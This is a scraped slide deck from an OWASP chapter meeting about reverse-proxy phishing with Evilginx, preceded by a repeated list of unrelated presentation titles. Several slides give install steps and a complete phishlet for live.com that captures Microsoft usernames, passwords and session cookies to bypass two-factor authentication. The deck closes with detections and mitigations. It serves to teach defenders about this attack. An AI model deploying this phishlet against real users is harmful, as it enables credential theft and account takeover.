MARGINALIZATION (Different learners in Marginalized Group
MARGINALIZATION (Different learners in Marginalized GroupMARGINALIZATION (Different learners in Marginalized Group
MARGINALIZATION (Different learners in Marginalized Group
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptx
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
 
ESSENTIAL of (CS/IT/IS) class 06 (database)
ESSENTIAL of (CS/IT/IS) class 06 (database)ESSENTIAL of (CS/IT/IS) class 06 (database)
ESSENTIAL of (CS/IT/IS) class 06 (database)
 
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
 
AmericanHighSchoolsprezentacijaoskolama.
AmericanHighSchoolsprezentacijaoskolama.AmericanHighSchoolsprezentacijaoskolama.
AmericanHighSchoolsprezentacijaoskolama.
 
Presiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha electionsPresiding Officer Training module 2024 lok sabha elections
Presiding Officer Training module 2024 lok sabha elections
 
MICROBIOLOGY biochemical test detailed.pptx
MICROBIOLOGY biochemical test detailed.pptxMICROBIOLOGY biochemical test detailed.pptx
MICROBIOLOGY biochemical test detailed.pptx
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...
 
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdfFraming an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
Framing an Appropriate Research Question 6b9b26d93da94caf993c038d9efcdedb.pdf
 
What is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPWhat is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERP
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptx
 

2023-May.pptx

  • 1. TM Meeting Starts at 7:05PM In the meantime, checkout https://granitecity.io
  • 3. OWASP FOUNDATION owasp.org Agenda 1) Food & Drinks 2)Community topics…… 3) Modern Phishing with Evilginx2/3
  • 4. OWASP FOUNDATION owasp.org Being at Granite City means you’re part of an engaging, inviting and supportive ecosystem. It means you’re in the company of like-minded and exciting professionals. It means you’ve joined a place to grow your business and be supported in the process. All memberships include: ✔ High-speed & secure wi-fi ✔ Access to printer/copier/scanner ✔ Invites to exclusive member-only social events and programs ✔ Use of our community kitchen ✔ Locally roasted craft coffee served hot and ready until 3pm Private Office & what you’ll get: ✔ 24/7 Access ✔ Digital Key Access ✔ 2 hours of free meeting room space per month (Town Hall or Gallery Coworking & what you’ll get: ✔ Part-Time Membership – 4 days per month access ✔ Weekdays – 8:30am-5pm Monday – Friday access, digital key entry, 2 hours of free meeting space per month (Gallery) ✔ Full Time – 24/7 access, digital key access, 2 hours of free meeting space per month (Gallery)
  • 5. OWASP FOUNDATION owasp.org OWASP Sacramento Chapter Community stuff
  • 6. OWASP FOUNDATION owasp.org Evilginx Reverse-proxy phishing framework able to bypass MFA [1]
  • 7. OWASP FOUNDATION owasp.org Phishing: A Brief History 1996 The Technique is Borne According to Internet records, the first time that the term “phishing” was used and recorded was on January 2, 1996. The mention occurred in a Usenet newsgroup called AOHell. The Phishing Continues Between May 2004 and May 2005, about 1.2 million users in the U.S. suffer losses caused by phishing, totaling approximately $929 million. 2000’s 2010’s Broad Adoption of HTTPS Phishermen begin implementing HTTPS via services like LetsEncrypt and victims who were taught to check for the lock symbol in their browser were given a sense of false security. 2017 Evilginx is released Custom version of Nginx HTTP server to provide MITM functionality, acting as a proxy between a browser and phished website. Defeats many implementations of Multifactor Authentication by capturing session tokens. 2020’s Cat and Mouse Games Phishing is still VERY effective, and Phishing as a service is now even a thing. Direct financial loss from successful phishing increased by 76% in 2022. https://www.phishing.org /history-of-phishing MITRE ATT&CK: Phishing T1566 MITRE ATT&CK: Phishing Link T1566.002 + MITRE ATT&CK: Steal Application Access Token T1528 MITRE ATT&CK: Man-in-the-Middle T1557 MITRE ATT&CK: Two-Factor Auth Interception T1111
  • 8. OWASP FOUNDATION owasp.org Modern Phishing: Evilginx Evilginx is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows attackers to bypass 2-factor authentication protection of many forms. Version 3 Released May 10th 2023 (Community and Pro Versions now available) ● HTTP client/server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. ● Implements its own DNS server. ● Utilizes LetsEncrypt for TLS certs and manages them for you. ● Does contain known signatures for Blue Teams, can be removed. Version 3 signatures TBD? ● FIDO2 will protect you as it’s domain specific. ● Operationalizing it takes creativity, speed, and contains many other small nuances. GitHub Project: https://github.com/kgretzky/evilginx2
  • 9. OWASP FOUNDATION owasp.org Evilginx: Primary Components ● Config: JSON file that can be preconfigured to aid in automated deployments ● Phishlets: YAML templates for specific target websites. Ex: O365, LinkedIn, etc. ● Lures: Pre-generated phishing links to send to victims, created from a Phishlet. ● Redirectors: Websites, acting as a landing pages to your phishing links. ● Sessions: Captured credentials and session cookies from victim interactions. ● Proxy: Outbound traffic proxy for dev purposes to to obscure infrastructure IP. ● Blacklist: Black scanners by IP, defaults to adding any request not made to a specific Lure URL.
  • 11. OWASP FOUNDATION owasp.org Evilginx: Basic Setup No IOC Removal, no proxy configuration, not part of another toolkit, etc. 1. Install Dependencies a. sudo apt install net-tools golang-go make 1. Clone the repository a. git clone https://github.com/kgretzky/evilginx2.git Demo Server Digital Ocean Ubuntu 22.10 VPS $6/month
  • 12. OWASP FOUNDATION owasp.org Evilginx: Basic Setup Cont. No IOC Removal, no proxy configuration, not part of another toolkit, etc. Configure DNS (free up port 53) a. sudo systemctl stop systemd-resolved b. Modify /etc/systemd/resolved.conf i. DNS=8.8.8.8 # or whomever else ii.DNSStubListener=no #make sure line uncommented c. sudo systemctl start systemd-resolved d. Set @ record and name servers as seen in images. Build Evilginx a. cd ./evilginx2 b. make c. mv ./build/evilginx ../ Install is over at this point, and you need a phishlet to use…
  • 13. OWASP FOUNDATION owasp.org Evilginx: Phishlet Philosophy My main goal has always been to deliver a reverse proxy phishing framework for red teamers. The provided example phishlets were always meant to serve as a learning material to learn how to make your own phishlets. Keeping them updated, was honestly an impossible feat… Phishlets get outdated and stop working relatively fast and I always wanted to focus on developing the framework, rather then keeping the example phishlets constantly up-to-date. I encourage everyone to set up their own repositories with phishlets they want to share with the community. My priority now is to put effort into teaching people how to create their own phishlets. -kgretzky Important Notes: ● The author’s course is $433.40, while fair this is a barrier for many. ● Free information on phishlet development is generally still very limited. ● Phishlets for popular sites/apps are often sold privately rather than published online.
  • 14. OWASP FOUNDATION owasp.org Evilginx: Phishlet Format ● proxy_hosts: The proxy_hosts parameter indicates which domains and subdomains that Evilginx will proxy between the real server and end user ● phish_sub: The phish_sub parameter indicates which subdomain to be used for the phishing hostname ● sub_filters: The sub_filters parameter is used to indicate the string substitution filters for dynamic content being proxied ● auth_tokens: The auth_tokens indicates which cookies are to be captured in the proxied response ● credentials: The credentials parameter indicates the parameters should be captured in the POST requests ● auth_urls: The auth_urls parameter specifies a URL that should be available once a user is fully authenticated which would indicate the authentication is complete ● login: The login parameter indicates where the location of the phishing landing page ● js_inject: This section defines all Javascript scripts that you want to inject into proxied pages.
  • 15. OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet The concept creating a phishlet is simple. Proxy the traffic during the login process with a tool such as BurpSuite or OWASP ZAP, determine the requests made, and create the appropriate phishlet as per Evilginx’s documentation… In practice this can be quite difficult depending on the complexity of the application you’re writing a phishlet for. The steps are roughly this. 1. Determine all relevant subdomains and include them under proxy_hosts 2. Add @ records to your registrar to proxy subdomains determined in the previous step. 3. Implement logic to parse for auth_tokens 4. Add auth_urls if auth_tokens are gathered through generic regular expressions. 5. Implement logic to parse credentials from POST request. 6. Add force post for “keep me signed in” (probably). 7. Add login domain and path parameters. 8. Bang head if additional protection mechanisms exist, and iterate the steps above. 9. Profit.
  • 17. OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet BurpSuite results for live.com’s login flow. Relevant domains in order of appearance. ● login.live.com ● logincdn.msauth.net ● account.live.com ● account.microsoft.com ● login.microsoftonline.com ● www.microsoft.com
  • 18. OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Once we’ve captured the login flow, we can analyze it and create proxy_host entries for the list of relevant subdomains discovered. By including the auto_filter: true flag, we can hopefully avoid defining many additional sub_filters manually (version 3 FTW!) author: '@d0n601' min_ver: '3.0.0' proxy_hosts: - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true, auto_filter: true} - {phish_sub: 'cdn', orig_sub: 'logincdn', domain: 'msauth.net', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'microsoft', orig_sub: 'account', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'login.microsoftonline', orig_sub: 'login', domain: 'microsoftonline.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'www', orig_sub: 'www', domain: 'microsoft.com', session: true, is_landing: false, auto_filter: true}
  • 19. OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Now we @ records for the phish_sub entries seen in the previous slide These are subdomains of the phishlet’s host.
  • 20. OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet In order to complete the auth_tokens entries, I’d recommend exporting the cookies of a successful login session using a browser plugin such as cookie editor. You can then define each one by name, or use a regular expression to catch dynamically generated values. In the case of live.com, through trial and error we can determine the only two cookies we need to bypass 2-FA are the following. auth_tokens: - domain: '.login.live.com' keys: ['SDIDC','JSHP'] type: 'cookie' JSON dump of cookies for live.com…look at what we need and catch them.
  • 21. OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet In order to complete the credentials entries, we can find the POST request containing our creds, and create queries for the username and password variables we see passed to the service. credentials: username: key: 'login' search: '(.*)' type: 'post' password: key: 'passwd' search: '(.*)' type: 'post'
  • 22. OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Putting all the pieces together, our new phishlet for live.com will look like this, author: '@d0n601' min_ver: '3.0.0' proxy_hosts: - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true, auto_filter: true} - {phish_sub: 'cdn', orig_sub: 'logincdn', domain: 'msauth.net', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'microsoft', orig_sub: 'account', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'login.microsoftonline', orig_sub: 'login', domain: 'microsoftonline.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'www', orig_sub: 'www', domain: 'microsoft.com', session: true, is_landing: false, auto_filter: true} auth_tokens: - domain: '.login.live.com' keys: ['SDIDC','JSHP'] type: 'cookie' credentials: username: key: 'login' search: '(.*)' type: 'post' password: key: 'passwd' search: '(.*)' type: 'post' force_post: - path: '/ppsecure/post.srf' search: - {key: 'login', search: '.*'} - {key: 'passwd', search: '.*'} force: - {key: 'KMSI', value: 'on'} type: 'post' login: domain: 'login.live.com' path: 'login.srf' Save this under the evilginx2/phishlets/ directory. In this example we’ll call it owasp2.yaml Note: Version 3 allows a phishlet to be created in 33 lines. In version two a similar phishlet took 101 lines. Many of these are subfilters. https://github.com/d0n601/Evilginx3-Phishlet-Playground
  • 23. OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Set the hostname of the phishlet, and then enable it.
  • 24. OWASP FOUNDATION owasp.org Evilginx: Creating a Phishlet Create a lure to use with the phishlet, give it a proper redirect_url to go to, and then get the phishing link.
  • 25. OWASP FOUNDATION owasp.org Modern Phishing with Evilginx DEMO
  • 27. OWASP FOUNDATION owasp.org Modern Phishing with Evilginx
  • 28. OWASP FOUNDATION owasp.org Evilginx: Mitigations Detections 1. Certificate transparency can reveal phishing subdomains pretty clearly, as seen here. a. https://crt.sh/?q=blackhatmail.live 1. X-Evilginx HTTP header (if not removed) a. IOC’s present in Evilginx2, not sure if or where they’re at in Evilginx3 yet. Mitigations 1. Passwordless options (certificate-based auth, Hello For Business, etc), FIDO2 security keys.
  • 29. OWASP FOUNDATION owasp.org Evilginx: Further Reading ● Evilginx Documentation ● 3.0 Release Blog Post ● Evilginx3 on GitHub ● Phishlet Repo for this presentation. ● Evilginx2 with IOC’s Removed ● Evilginx2 with IOC’s Removed again, commit diff helps visualise ● An0nUD4Y’s Evilginx2 Phishlet repository (archived as of this week) ● EvilGoPhish a phishing toolkit which includes Evilginx2, among other things. ● Catching Transparent Phish: Analyzing and Detecting MITM Phishing Toolkits
  • 30. OWASP FOUNDATION owasp.org OWASP Community Next Meeting: June 21st from 7PM-9PM (same location) Call for Presentations: June and July (same location) If you’d like to present (or know someone else who would) at the OWASP Sacramento Chapter’s upcoming meetings, please email us your topic. You don’t need to be an expert! Joubin: joubin.jabbari@owasp.org Ryan: ryan.kozak@owasp.org